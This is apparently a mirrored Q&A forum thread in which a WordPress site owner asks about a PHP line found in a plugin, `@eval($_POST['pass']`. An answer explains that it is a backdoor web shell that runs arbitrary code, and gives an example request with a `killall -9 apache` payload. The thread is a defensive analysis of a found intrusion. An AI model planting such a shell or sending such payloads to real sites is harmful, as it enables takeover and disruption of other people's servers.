Found <?php @eval($_POST['pass']

2019-07-05 18:05发布

I found this code in one of my wordpress plugin site. I guess it can be used with malicious intent but what exactly it does and can I find out if it calls some other actions that I should be aware of?

2条回答
小情绪 Triste *
2楼-- · 2019-07-05 18:11

Yes, it is very bad. I can't imagine any situation where this code could exist as the part of a harmless software.

This code essentially allows to run any php code given by the pass get parameter. For example, calling this php as http://yoursite/your.php?pass=system("killall -9 apache"); will shot down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file. And later to get this temporary file back).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.

查看更多
登录 后发表回答